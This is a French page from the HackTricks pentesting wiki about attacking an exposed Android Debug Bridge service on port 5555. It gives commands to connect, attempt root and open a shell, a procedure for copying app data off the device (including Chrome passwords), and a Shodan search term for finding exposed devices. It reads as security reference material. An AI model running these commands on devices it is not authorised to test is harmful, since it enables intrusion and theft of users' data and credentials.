4.2 KiB
5555 - Android Debug Bridge
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
Informations de base
Android Debug Bridge (adb) est un outil en ligne de commande polyvalent qui vous permet de communiquer avec un appareil. La commande adb facilite une variété d'actions sur les appareils, telles que l'installation et le débogage d'applications, et elle fournit un accès à un shell Unix que vous pouvez utiliser pour exécuter une variété de commandes sur un appareil. (depuis ici)
Port par défaut : 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Connexion
Si vous trouvez le service ADB en cours d'exécution sur un port d'un appareil et que vous pouvez vous y connecter, vous pouvez obtenir un shell à l'intérieur du système :
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Pour plus de commandes ADB, consultez la page suivante :
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Extraire les données d'une application
Pour télécharger complètement les données d'une application, vous pouvez :
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Vous pouvez utiliser cette astuce pour récupérer des informations sensibles comme les mots de passe de Chrome. Pour plus d'informations à ce sujet, consultez les informations et références fournies ici.
Shodan
android debug bridge
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.